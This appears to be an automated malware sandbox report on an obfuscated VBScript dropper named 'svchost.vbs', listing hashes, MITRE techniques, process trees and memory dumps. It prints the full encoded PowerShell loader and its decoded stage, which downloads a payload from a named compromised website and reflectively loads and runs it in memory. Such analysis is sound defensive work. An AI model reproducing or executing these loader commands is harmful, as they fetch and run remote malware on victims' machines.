3fc452863dc66976a6d40d91b9706053f1afa362e9c6f43d04fe4a4b526c148d

General

Target

svchost.vbs
Size

1.6MB
MD5

dd777abe140a21d03c52d83f0972ea03
SHA1

7135fada7f4e9562a80f9b3755f2e4e8df808619
SHA256

3fc452863dc66976a6d40d91b9706053f1afa362e9c6f43d04fe4a4b526c148d
SHA512

658f7218b40a0dc7fbaf8781f370e3f9201305958347ef56b989d92859eddd6b1e44f1f2efc26c64c70d4b5d9585c510b225810611b71c4abab57fab68bcac9e
SSDEEP

3072:BiiiiiiiiiiiiiiiiiiiiUiiiiiiiiiiiiiiiiiiiihiiiiiiiiiiiiiiiiiiiic:f

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.alinstantecolombia.com/wp-content/uploads/2024/09/dllsky.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2712	powershell.exe
6	2712	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
2712	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2724	powershell.exe
2712	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2892 wrote to memory of 2724	2892	WScript.exe	30
PID 2892 wrote to memory of 2724	2892	WScript.exe	30
PID 2892 wrote to memory of 2724	2892	WScript.exe	30
PID 2724 wrote to memory of 2712	2724	powershell.exe	32
PID 2724 wrote to memory of 2712	2724	powershell.exe	32
PID 2724 wrote to memory of 2712	2724	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bq▒G4▒YQBu▒Hg▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒YwBo▒Gg▒ZQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HY▒YQBk▒GE▒aw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB3▒Hc▒dw▒u▒GE▒b▒Bp▒G4▒cwB0▒GE▒bgB0▒GU▒YwBv▒Gw▒bwBt▒GI▒aQBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQ▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒B2▒GE▒Z▒Bh▒Gs▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒bwBq▒GU▒aQB2▒HM▒bwBj▒G0▒ZQBy▒C8▒OQ▒w▒C8▒N▒▒y▒D▒▒Mg▒v▒HM▒Z▒Bh▒G8▒b▒Bw▒HU▒LwB0▒G4▒ZQB0▒G4▒bwBj▒C0▒c▒B3▒C8▒bQBv▒GM▒LgBh▒Gk▒YgBt▒G8▒b▒Bv▒GM▒ZQB0▒G4▒YQB0▒HM▒bgBp▒Gw▒YQ▒u▒Hc▒dwB3▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwBj▒Gg▒a▒Bl▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒G4▒YQBu▒Hg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\svchost.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jnanx = '0';$ochhe = 'C:\Users\Admin\AppData\Local\Temp\svchost.vbs';[Byte[]] $vadak = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.alinstantecolombia.com/wp-content/uploads/2024/09/dllsky.txt'));[system.AppDomain]::CurrentDomain.Load($vadak).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ojeivsocmer/90/4202/sdaolpu/tnetnoc-pw/moc.aibmolocetnatsnila.www//:sptth' , $ochhe , '_______________________-------------', $jnanx, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0bb1a4a68c2084fed4f0ff7ed3dadcad

SHA1
92f597286760665600fa03b44d786f9b12a9bcef

SHA256
90c31088279d6948a607266144a44023a4f77248dc32b053733b5100d10db538

SHA512
f527fc2829ad0183af9c4b81e0364b80575606d53d56273dba362278af67044ebb3db1a95bf1c8059e50bf7b5a49f6cb465c5c11d3fc5d91537fc34193b86840

Download Submit
memory/2724-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

Filesize
4KB

Download
memory/2724-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download
memory/2724-6-0x0000000001CC0000-0x0000000001CC8000-memory.dmp

Filesize
32KB

Download
memory/2724-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-13-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-14-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing